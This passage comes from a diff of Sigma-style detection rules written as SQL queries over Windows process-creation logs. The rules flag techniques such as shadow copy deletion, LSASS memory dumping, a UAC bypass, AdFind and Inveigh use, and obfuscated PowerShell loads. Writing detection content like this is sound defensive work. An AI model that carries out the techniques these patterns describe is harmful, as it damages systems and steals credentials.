Anhaus, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same command line flag" + "Highly likely if rar is a default archiver in the monitored environment." ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml" + "filename": "proc_creation_win_rar_compress_data.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "App-V clients" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "status": "experimental", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", + "attack.defense_evasion", "attack.t1059.001", + "attack.t1027" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" + }, + { + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1553.004" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": 